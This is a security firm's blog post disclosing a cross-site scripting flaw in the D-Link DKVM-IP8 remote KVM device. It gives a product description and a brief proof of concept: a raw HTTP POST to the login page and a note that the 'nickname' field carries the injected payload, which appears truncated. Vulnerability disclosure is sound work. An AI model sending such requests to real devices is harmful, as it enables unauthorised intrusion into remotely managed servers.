• Home
• Services
• Labs
• About
• Contact

D-LINK XSS Vulnerability (DKVM-IP8)

A cross site scripting vulnerability has recenly been uncovered on the D-Link DKVM-IP8. Proof of concept code is available at the bottom of this post.

About the D-Link DKVM-IP8
DKVM-IP8 defines a new class of remote KVM access device; it combines digital remote KVM access via IP networks with comprehensive and integrated system management. DKVM-IP8 owes a convenient, remote KVM access and control via LAN or Internet. It captures, digitizes, and compresses video and transmits it with keyboard and mouse signals to and from a remote computer. Also it provides a non-intrusive solution for remote access and control. Remote access and control software runs on its embedded processors only but not on mission-critical servers, so that there is no interference with server operation or impact on network performance.

/*

 Exploit Title: D-LINK DKVM-IP8 XSS Vulnerability

 Software Link: http://www.dlink.ru/

 Version: 2282_dlinkA4_p8_20071213

 Tested on: Windows Sp 2

 Site : http://Hacking.ge

 Code :

*/



POST http://site.com80/auth.asp HTTP/1.0

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Host: 212.58.116.80

Content-Length: 90

Connection: Close

Pragma: no-cache

Attack details

The POST variable nickname has been set to 1>">">

• Company News
• General
• Industry News
• Research

The content, tools, methodologies and proof of concept code contained in these articles are in no way intended to be used for malicious intent. This information is to be used for educational purposes only. RedTeam Security does not condone the malicious use nor does it warranty the use of any of the content contained herein.

Phone number:
1-612-234-7848

E-mail:

info@redteamsecure.com